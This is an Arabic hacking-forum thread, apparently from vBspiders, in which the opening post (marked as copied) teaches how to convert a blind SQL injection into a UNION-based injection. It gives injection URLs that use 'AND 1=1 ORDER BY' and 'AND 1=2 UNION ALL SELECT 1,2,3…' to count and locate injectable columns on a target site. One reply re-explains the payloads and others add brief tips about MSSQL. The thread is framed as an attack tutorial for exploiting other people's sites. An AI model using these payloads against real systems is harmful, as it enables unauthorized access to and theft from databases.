:: vBspiders Professional Network ::
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   تحويل الحقن من Blind الى سكيول عادي (http://www.vbspiders.com/vb/t34222.html)

عبد الله ر 08-08-2010 02:55 PM
تحويل الحقن من Blind الى سكيول عادي
 
السلام عليكم ورحمة الله وبركاته
كيفكم شباب الكثير منا واجه صعوبة في استغلال البلايند اسكيول


بس بعد هذا الدرس حتقدر تستغل البلايند اسكيول باسهل الطرق

ومهما كان اصدار قاعدة


قكرة الاستغلال هي تحويل طريقة استغلال من ثغرة بلايند اسكيول الى ثغرة سكيول عادي



طيب نبدا بشرح


كلنا يعلم اننا لما نريد استغلال ثغرة سكيول نطبق امر


كود PHP:
ORDER BY 


لمعرفة عدد الاعمدة المصابة


في الحالة العادية نضع



كود PHP:
  site.com/index.php?id=1 ORDER BY 1 

لتحويل الاستعلام من بلايند الى عادي نقوم بما يلي طبعا بعد


ان ننتأكد من خطأ الاسكيول عن طريق

and 1=1 & and 1=0


يجب ان تكون قيمة متغير مصاب صحيحة (and 1=1) مثال :


كود PHP:
  site.com/index.php?id=AND 1=1 ORDER BY 1 



يعني خلينا شرط صحيح 1=1 وطبقنا استعلام order by


قيمة متغير صحيحة وهي 1



طيب الآن علمنا ما هو عدد اعمدة نريد ان نعرف الاعمدة المصابة نكتب

كود PHP:
  site.com/index.php?id=AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,



لاحظوا كيف معادلة غير صحيحة لأننا في سكيول العادي كنا نعطي متغير مصاب


قيمة غير صحيحة بوضع - بعد اشارة =

انتبه الى اشارة الناقص (-)



كود PHP:
  site.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,



لاحظوا ان قيمة المتغير المصاب -1 غير صحيحة وهي نفسها 1=2


الآن نكمل استغلالنا عادي تماما وحسب اصدار القاعدة :bad:


ارجو ان يكون شرح مفهوم


السلآم عليكم

(منقول)

CODE3 08-08-2010 03:17 PM
مشكـــــور جــــدا

Master vbspiders 08-08-2010 03:42 PM
[align=center]بارك الله فيك
تحياتي[/align]

عبد الله ر 08-08-2010 05:20 PM
هلا بالشباب
نورتو الموضوع

darkman.dz 08-08-2010 05:33 PM
ana mafhamt wala haja !!!!!!!!!!!!!

عبد الله ر 08-08-2010 06:11 PM
مرحبا اخي ooooo_darkman_ooooo تكرم عينك هي شرح على السريع:
القصة كلها لتحويل البلايند الى اسكيول عادي عن طريق وضع الامر and 1=1 مع تغير القيمة وجعلها خاطئة او صحيحة

حيث نضعها صحيحة مع الامر order by هكذا site.com/index.php?id=1 AND 1=1 ORDER BY 1

ونجعلها خاطئة مع الامر union select هكذا site.com/index.php?id=1 AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8

تكون خاطئة او صحيحة بتغير القيمة 1=1 بـ 1=0 او اي رقم اخر
ارجو ان اكون قد وفقت بالشرح

KALASH3R 08-10-2010 03:39 PM
يعطيك العافية

بارك الله فيك

ViRuS_ViH 08-21-2010 11:28 AM
مشكـــــور جــــدا

دام علاء العماد 09-17-2011 01:14 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
جزاك الله خيرا يا أخي الفاضل

المفترس 10-06-2011 10:24 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
بارك الله فيك

kamarado 10-06-2011 10:38 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
ألف شكر أخي

aircrack -ng 10-06-2011 10:53 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
على حسب خبرتي البسيطه هي الطريقه تستعمل في mssql لما يكون الخطا Internal server error 500
نعمل الامر and وبعدها نفذ استعلام order by
هذا والله يعلم

يحيى زكريا 10-25-2011 06:44 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
باراك الله فيك اخي
لك مني اجمل تحية

يحيى زكريا 10-25-2011 07:07 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
بارك الله فيك

hank00sh 11-09-2011 06:14 PM
رد: تحويل الحقن من Blind الى سكيول عادي
 
مشكور يا محترف ما قصرت

جزاك الله الف خير

وكثر الله من امثالك

الحين فهمت يعني كل الهرجه في هذا الامر

ALL

على حسب علمي

لاني كم مره تابعت شروحات للاخوان بخصوص الثغره

ووجد انهم يستخدمون الامر هذا

يعني على حسب علمي صح اني محترف SQL بس ما ادري هل كلامي صحيح في الامر

واذا مو صحيح ارجو التصحيح

تحياتي لك


الساعة الآن 03:50 AM
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0